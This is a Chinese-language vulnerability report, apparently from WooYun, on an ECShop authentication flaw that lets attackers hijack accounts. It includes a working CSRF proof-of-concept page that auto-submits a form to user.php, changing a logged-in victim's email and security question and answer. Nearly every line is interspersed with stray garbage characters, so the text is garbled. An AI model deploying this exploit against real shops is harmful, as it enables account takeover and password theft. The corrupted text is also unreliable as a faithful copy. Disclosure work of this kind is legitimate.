简要描述:4 A! c6 \; Q2 Q4 K% m" _
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
2 _/ w$ Y! a3 K+ K: Z8 q+ M# @; W" S3 v9 e
Demo For:http://www.wooyun.org/bug.php?action=view&id=3952 }! G- l% V$ B& K( i
u r k3 R2 q8 C/ }: N
详细说明:) W$ y) {- e. b
利用csrf和xss可以突破官方所说的“障碍”4 h% d( i& B- S: [" n& w6 b( Q
xss版本已经有人说明" q2 f5 |0 B e+ f9 v" O
这里给出csrf版本% z- O& f" s, l
# ]; D. y/ t8 `6 A
漏洞证明:% E2 d" X+ S& ?8 M* q" b) ~
<html>
* j! i- I: _6 F' X: ~+ ]8 m x<body>3 K4 O0 T) Y/ m
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
' {* V# j2 S4 ~& i' q k<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
+ V, q9 n/ B M6 v+ r- V<INPUT TYPE="text" NAME="act" value="act_edit_profile">
1 \# V' }( Z* Z& t! @+ O; P<INPUT TYPE="text" NAME="sel_question" value="ecshop">; ^1 e7 ^+ ~0 |3 j2 ^) Z% ~
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">/ R) E/ F+ J3 y9 t1 T. `$ V( Q
</body>
% P% `; h9 d- W<script>
) f% B! p8 f7 f9 g' Gdocument.forms[0].submit();
% t: @7 p% i5 t5 Q</script>; f" ^! r! G7 ^! v
</html>0 \$ i7 t! V0 p3 w2 D, ^$ L! M
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失; J, p/ L: g, {& r0 e; o1 V
3 D! I+ C' \, F7 n9 M
|